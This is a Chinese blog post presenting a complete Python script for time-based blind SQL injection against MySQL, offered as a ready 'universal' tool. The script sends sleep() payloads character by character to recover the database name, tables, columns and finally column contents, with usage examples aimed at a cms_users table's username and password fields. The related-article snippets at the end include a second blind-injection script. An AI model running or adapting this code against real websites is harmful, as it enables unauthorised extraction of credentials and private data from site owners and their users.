sql注入:延时注入python万能脚本

已于 2023-11-09 19:14:37 修改
阅读量242 收藏 2
点赞数
分类专栏: python sql注入 exp 文章标签: sql python 数据库
于 2023-11-08 13:52:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_70137901/article/details/134287810
版权
python 同时被 3 个专栏收录
7 篇文章 0 订阅
订阅专栏
sql注入
6 篇文章 0 订阅
订阅专栏
exp
2 篇文章 0 订阅
订阅专栏

sql注入:延时注入python脚本

import requests
import binascii
def judgment_delay(complete_url):
    headers={
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36"
    }
    try:
        requests.get(url=complete_url,headers=headers,timeout=3)
    except requests.exceptions.ReadTimeout:
        return "time out"
    else:
        return "normal"
def judgment_exploit(url):
    payload=" and sleep(6) #"
    complete_url=url+payload
    num=judgment_delay(complete_url)
    if "time out" in num:
        print("[+] 存在延迟漏洞")
    else:
        exit("[-] 不存在延迟漏洞")

def content(url,need_boom,table_name):
    num=len(need_boom)
    for j in range(0,100):
        if j==0:
            print("[+] 爆破字段内容模块启动成功")
            print("[+] 小脑瓜在飞速运作中请稍等.....")
        flag=0
        mh=0
        for k in need_boom:
            print("-------------------------------------------------------------------------------------------------------------------------------------")
            mh+=1
            for l in range(1,100):
                flag1=0
                for m in range(20,127):
                    payload=f" and if(ascii(substr((select {k} from {table_name} limit {j},1),{l},1))={m},sleep(5),1)"
                    complete_url = url + payload
                    if judgment_delay(complete_url) == "time out":
                        print(chr(m), end="")
                        flag=1
                        flag1=1
                        break
                if flag1==0 and l>100:
                    exit("[+] 爆破结束结束感谢使用")
                elif flag1==0:
                    break
            if mh<num and flag==1 :
                print(':',end="")
            print("--------------------------------------------------------------------------------------------------------------------------------------")
        if flag == 0:
            break


def column_name(url,table_name,table):
    print("[+] 爆破字段名模块启动成功")
    print("[+] 一拳超人正在蓄力中....")
    column_name_list=[]
    for i in range(0, 100):
        column_name = ""
        print(f"[{i + 1}]:", end="")
        flag = 0
        for j in range(1, 100):
            flag1 = 0
            for k in range(20, 127):
                payload = f" and if(ascii(substr((select column_name from information_schema.columns where table_schema = database() and table_name={table_name} limit {i},1),{j},1))={k},sleep(5),1) "
                complete_url = url + payload
                if judgment_delay(complete_url) == "time out":
                    print(chr(k), end="")
                    column_name += chr(k)
                    flag1 = 1
                    flag = 1
                    break
            if flag1 == 0:
                break
        if flag == 0:
            break
        column_name_list.append(column_name)
        print('\r')
    print("\r")
    if input("是否要爆破字段里的内容(y/n):")=="y" or "Y" :
        num=int(input("请输入要爆破的字段个数:"))
        need_boom=[]
        for i in range(0,num):
            need_boom.append(column_name_list[int(input("请输入要爆破的字段序号:"))-1])
        table_name=table
        content(url,need_boom,table_name)

def table_name(url):
    table_name_list=[]
    for i in range(0,100):
        table_name=""
        print(f"[{i+1}]:",end="")
        flag=0
        for j in range(1,100):
            flag1=0
            for k in range(20,127):
                payload=f" and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit {i},1),{j},1))={k},sleep(5),1)"
                complete_url=url+payload
                if  judgment_delay(complete_url) == "time out":
                    print(chr(k),end="")
                    table_name+=chr(k)
                    flag1=1
                    flag=1
                    break
            if flag1==0:
                break
        print('\r')
        if flag ==0:
            break
        table_name_list.append(table_name)
    if input("是否爆破字段?(y/n):") == "y" or "Y":
        table=table_name_list[int(input("请输入要爆破哪张表里的字段的序号:"))-1]
        table_name = "0x" + binascii.hexlify(table.encode()).decode()
        column_name(url,table_name,table)
    else:
        exit("good bey")


def database_name(url,length):
    print("[+] 鸽鸽正在下蛋中......")
    database_name=""
    print("[+] 数据库名",end=":")
    for  i in range(1,length+1):
        for j in range(20,127):
            payload= f" and if(ascii(substr(database(),{i},1))={j},sleep(5),1) --+"
            conplete_url=url+payload
            if "time out" in judgment_delay(conplete_url):
                database_name+=chr(j)
                print(chr(j),end="")
                break
    print('\n')
    if input("是否爆破表名?(y/n):") == "y" or "Y" :
        print("[+] 小脑瓜正在飞速运转中...")
        table_name(url)
    else:
        exit("感谢使用!")

def database_length ():
    length=0
    url=input("请输入url:")
    judgment_exploit(url)
    print("正在计算长度...")
    for i in range(1,1000):
        payload=f" and if (length(database())={i},sleep(5),1)"
        conplete_url=url+payload
        if  "time out" in judgment_delay(conplete_url):
            length=i
            break
    print("[+] 数据库名的长度为:",length)
    if input("是否爆破库名? (Y/N):") == 'y' or  'Y':
        database_name(url,length)
    else:
        exit()
print("""
            _   _____       _                      _   _       _           _   _             
           | | |  __ \     | |                    | | (_)     (_)         | | (_)            
  ___  __ _| | | |  | | ___| | __ _ _   _  ___  __| |  _ _ __  _  ___  ___| |_ _  ___  _ __  
 / __|/ _` | | | |  | |/ _ \ |/ _` | | | |/ _ \/ _` | | | '_ \| |/ _ \/ __| __| |/ _ \| '_ \ 
 \__ \ (_| | | | |__| |  __/ | (_| | |_| |  __/ (_| | | | | | | |  __/ (__| |_| | (_) | | | |
 |___/\__, |_| |_____/ \___|_|\__,_|\__, |\___|\__,_| |_|_| |_| |\___|\___|\__|_|\___/|_| |_|
         | |                         __/ |                   _/ |                            
         |_|                        |___/                   |__/                             
                                                                                                                --- xl
        延时注入脚本
        使用方法 
        python3 delay_injection.py http://127.0.0.1:8080/Less-1/?id
        help:
            url=http://ip/cms/show.php?id=33        
""")
# l=["username","password"]
# content(url="http://10.9.47.77/cms/show.php?id=33",need_boom=l,table_name='cms_users')

try:
    database_length()
except requests.exceptions.MissingSchema:
    exit("[-] 启动失败请检测url是否正确")
except NameError:
    exit("[-] 启动失败请检测环境是否正确")
except KeyboardInterrupt:
    exit("[-] 用户结束脚本")
except Exception:
    exit("[-] 用户操作错误")

效果:
在这里插入图片描述

抠脚大汉在网络
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 1541
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔型注入获取数据而采用一种突破注入的技巧。在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
SQLsqli_labs)延时注入_堆叠查询
weixin_42786460的博客
08-30 90
sql延迟注入_sql堆叠查询
sqlite注入总结
最新发布
2201_75824562的博客
05-31 697
一份简单的sqlite注入总结
sqli-labs盲注脚本
06-24
sqli-labs盲注脚本 sqli-labs盲注脚本 sqli-labs盲注脚本
sql注入------基于时间延迟benchmark函数注入脚本
weixin_30291791的博客
11-28 409
#author:windy_2import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '...
SQL 注入——延时注入 / Python 脚本爆破
weixin_51559599的博客
11-07 261
由于网络问题等原因,若超时时间太短可能造成爆破不准确,但超时时间设置过长会导致爆破时间成本上升,为提升准确性 ,爆破时间稍长 ,不报错则耐心等待。由于网络问题等原因,若超时时间太短可能造成爆破不准确,但超时时间设置过长会导致爆破时间成本上升。此处按位测试第一个字符,如果当前数据库第一个字符匹配时,则加载五秒。通过 if 中的条件,如果为真则沉睡,否则不沉睡。依次判断每个表的每个字符,若沉睡,则字符匹配。为了节省爆破时间,将延时改为 1。此种方法爆破时间比延时注入长。脚本中的判断条件:延时
python sql延时注入脚本(从数据库名到字段)
m0_61815757的博客
04-13 2645
python sql延时盲注脚本
python脚本sql延时注入、内网主机扫描脚本
agrilly的博客
07-19 138
python脚本
SQL住入原始脚本_SQL注入python脚本_
10-03
标题中的“SQL住入原始脚本”指的是利用SQL注入技术来编写或执行的原始SQL命令,而“SQL注入python脚本”则表明我们将探讨如何使用Python编写脚本来自动化这一过程。 SQL注入攻击主要有三种类型:直列注入延时...
sql_injector.py.tar.gz_SQL injector_in_injector python_python sq
09-14
`sql_injector.py`是用于自动化测试SQL注入漏洞的脚本,主要适用于Python环境。它通过模拟恶意用户输入,尝试识别和利用潜在的SQL注入漏洞。这个工具对于网络安全研究人员和Web开发者来说,是进行安全审计和防护的...
BlindMap:Blindmap 是一种检测 MSSQL Server 上基于时间的 sql 注入的工具
06-01
该工具利用了 MSSQL Server 的特定行为,例如延时查询或睡眠函数,来探测数据库是否对注入SQL 语句有响应,从而识别潜在的注入点。 **BlindMap 的工作原理** 1. **探测阶段**:BlindMap 会自动构造一系列的 SQL...
结合手工注入编写一个SQL盲注脚本——以SQLi-Labs less16为例.doc
07-09
Python脚本中,我们使用requests库来发送POST请求,并使用headers和data参数来模拟登录请求。在获取数据库名时,我们可以使用循环来猜测数据库名的长度,并使用万能密码来确定数据库名的长度。最后,我们可以使用...
京东爬虫python脚本
07-11
首先,`python脚本爬虫京东商品列表`意味着我们需要了解Python的基础语法,如变量、控制流、函数等。Python是爬虫开发的常用语言,因其简洁的语法和丰富的第三方库而备受青睐。在爬取京东商品列表时,可能会用到...
mysql延时注入脚本_py延迟注入SQL脚本
weixin_29450147的博客
01-19 272
#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):threading.Thread.__init_...
SQL注入延时注入
qq_45557130的博客
10-07 1539
sql注入延时注入
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1600
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注。
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入
Pluto.的博客
12-27 2371
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
3.2 SQL盲注-时间注入--sql注入python脚本自动打印数据库信息
n0d_xy的博客
04-15 1274
简介:文章分为三部分:1、概要;2、详细的思维导图;3、详细的解说。 描述:概要包括该文介绍的知识点;详细的思维导图更好地理清思路,方便记忆,但对于有些对于作者比较基础的内容不会有详细的解释,建议主动了解;详细的解说作者会根据思维导图的纲要添加代码语句等内容,有时间会添加具体操作,具体步骤,操作结果等内容,添加需要注意的Tips(蓝色字体怎样)。 前面的话:操作学习的环境----Linux环境...
SQL Injection (Blind) time盲注入
Appleteachers的博客
04-14 452
python3编写EXP系列 SQL Injection (Blind) time盲注入 1 简介 DVWA靶场这个是最基础的靶场如果想学习EXP编写这个靶场最好不过,如果能把这个靶场的利用的EXP用python3编写出来这样算是合格的exp入门选手了。 https://github.com/digininja/DVWA 这个系列的第五篇内容这里会学习到如何通过时间注入,获取账号和密码。 盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者
sql注入盲注python脚本
04-06
SQL注入是一种常见的安全漏洞,它允许攻击者通过在应用程序的输入字段中插入恶意的SQL代码来执行未经授权的操作。而盲注是一种特殊类型的SQL注入攻击,攻击者无法直接获取数据库的具体信息,但可以通过不断尝试不同的条件来判断是否存在漏洞。 下面是一个使用Python编写的简单SQL注入盲注脚本的示例: ```python import requests def check_vulnerable(url): payload = "' OR 1=1 --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: return True else: return False def exploit_blind(url): result = "" characters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" while True: found = False for char in characters: payload = "' OR SUBSTRING((SELECT database()), 1, 1) = '" + char + "' --" response = requests.get(url + "?id=" + payload) if "Welcome" in response.text: result += char found = True break if not found: break return result # 示例使用方法 url = "http://example.com/vulnerable_page" if check_vulnerable(url): database_name = exploit_blind(url) print("数据库名称:", database_name) else: print("目标网站不易受SQL注入攻击") ``` 上述脚本中,`check_vulnerable`函数用于检测目标网站是否易受SQL注入攻击,它通过在URL中插入特定的payload来判断是否存在漏洞。`exploit_blind`函数用于利用盲注漏洞获取数据库名称,它通过不断尝试不同的字符来逐个获取数据库名称的每个字符。 请注意,上述脚本仅为示例,实际使用时需要根据具体情况进行修改和扩展,同时要遵循法律和道德规范,仅在合法授权的范围内使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值